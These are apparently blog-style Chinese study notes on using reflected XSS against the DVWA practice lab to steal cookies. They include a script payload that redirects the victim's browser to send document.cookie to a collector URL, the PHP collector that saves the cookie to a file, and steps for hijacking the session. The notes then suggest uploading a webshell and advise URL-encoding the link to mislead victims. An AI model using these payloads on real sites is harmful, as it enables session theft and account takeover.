利用xss盗取cookie学习笔记


cookie介绍

Cookie 是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie是由web服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。
目前有些Cookie是临时的,有些则是持续的。临时的Cookie只在浏览器上保存一段规定的时间,一旦超过规定的时间,该Cookie就会被系统清楚
服务器可以利用Cookie包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传输中的状态。
Cookie最典型的应用是判定注册用户是否已经登录网站,用户可能会得到提示,是否在下一次进入此网站时保留用户信息以便简化登录手续,这些都是Cookie的功用。另一个重要应用场合是“购物车”之类的处理。用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品,这些信息都会写入Cookies,以便在最后付款时提取信息。


反射型xss盗取cookie

url?uname=<script>document.location=http://ip/cookie.php?cookie="+document.cookie</script>
location-->重定向
重定向到恶意url

将链接发送到用户,用户点击即触发XSS漏洞。同时可以使用URL编码来迷惑用户。

可以在dvwa中尝试一下

cookie.php代码
<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
?>

在dvwa对应界面   XSS(Reflected)(low)
url/?name=<script>document.location='http://127.0.0.1/对应文件夹/cookie.php?cookie="+document.cookie</script>#

可以在cookie.php所在文件夹下发现cookie.txt

利用cookie会话劫持

打开cookie.txt文件,找到Cookie值,访问目标站点,修改Cookie为Cookie.txt文件中的值
可抓包修改
从而直接进入index.php界面而不是login.php界面


劫持会话后的操作

1、进入后台寻找上传点等进一步利用漏洞上传一句话webshell

例如虚拟机在使用桥接模式时(可以直接访问本机的靶场)在dvwa中上传一个一句话木马,就能连接到本机、可以直接访问本机文件(非常可怕的一个操作!!!).

2、修改配置,查找敏感信息等

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值